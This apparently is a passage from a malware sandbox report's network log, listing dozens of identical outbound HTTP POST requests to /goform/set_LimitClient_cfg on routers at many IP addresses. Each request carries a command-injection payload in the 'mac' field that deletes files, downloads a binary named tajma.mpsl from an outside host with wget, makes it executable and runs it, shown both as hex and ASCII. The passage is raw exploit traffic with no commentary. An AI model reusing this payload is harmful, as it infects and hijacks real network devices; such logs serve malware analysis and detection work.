                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1635192.168.2.2341480117.168.68.998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415230989 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1636192.168.2.2334444147.178.35.2048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415290117 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1637192.168.2.2347684204.98.108.1068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415323019 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1638192.168.2.234710212.73.17.758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415350914 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1639192.168.2.2340432134.153.132.1018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415360928 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1640192.168.2.2344278108.231.152.2358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415416002 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1641192.168.2.23577024.118.84.678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415441990 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1642192.168.2.2343510114.3.125.158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415525913 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1643192.168.2.2359954162.202.145.2098080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415554047 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1644192.168.2.234624625.231.141.1338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415574074 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1645192.168.2.236081052.128.153.878080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415595055 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1646192.168.2.234402248.10.254.248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415652990 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1647192.168.2.234030689.16.184.268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415682077 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1648192.168.2.2355574139.121.58.28080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415682077 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1649192.168.2.23570909.24.244.658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415702105 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1650192.168.2.234194484.179.39.2018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416316986 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1651192.168.2.2347860109.251.81.1768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416392088 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1652192.168.2.235119875.157.178.1348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416419029 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1653192.168.2.2353522108.112.60.708080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416469097 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1654192.168.2.2356806185.172.69.438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416492939 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1655192.168.2.235813052.253.144.2238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416501999 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1656192.168.2.233872680.28.19.568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416520119 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1657192.168.2.233910437.135.26.228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.416590929 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
